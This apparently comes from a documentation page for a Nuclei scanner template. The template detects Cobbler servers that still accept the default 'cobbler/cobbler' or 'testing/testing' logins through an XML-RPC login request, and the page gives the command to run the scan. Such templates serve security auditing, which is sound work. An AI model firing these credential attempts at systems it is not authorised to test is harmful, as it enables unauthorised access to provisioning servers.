Skip to content

Cobbler Default Login

ID: cobbler-default-login

Severity: high

Author: c-sh0

Tags: cobbler,default-login,api,seclists

Cobbler default login credentials for the testing module (testing/testing) were discovered.

id: cobbler-default-login
info:
name: Cobbler Default Login
author: c-sh0
severity: high
description: Cobbler default login credentials for the testing module (testing/testing) were discovered.
reference:
- https://seclists.org/oss-sec/2022/q1/146
- https://github.com/cobbler/cobbler/issues/2307
- https://github.com/cobbler/cobbler/issues/2909
classification:
cwe-id: CWE-798
metadata:
max-request: 2
tags: cobbler,default-login,api,seclists
http:
- raw:
- |
POST {{BaseURL}}/cobbler_api HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
<?xml version='1.0'?>
<methodCall>
<methodName>login</methodName>
<params>
<param>
<value>
<string>{{username}}</string>
</value>
</param>
<param>
<value>
<string>{{password}}</string>
</value>
</param>
</params>
</methodCall>
attack: pitchfork
payloads:
username:
- cobbler
- testing
password:
- cobbler
- testing
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- 'text/xml'
- type: dsl
dsl:
- "!contains(tolower(body), '<name>faultCode</name>')"
- "!contains(tolower(body), 'login failed')"
condition: or
- type: regex
part: body
regex:
- "(.*[a-zA-Z0-9].+==)</string></value>"
# digest: 490a00463044022041150014ace9ce6bead0270848a55023c2a9448f1b9ccf016f229b2baf36764102201ed451c487579dec0c60bad3a51e6c89983f13fbaa2801d8d119703f800ce6e9:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/cobbler/cobbler-default-login.yaml"

View on Github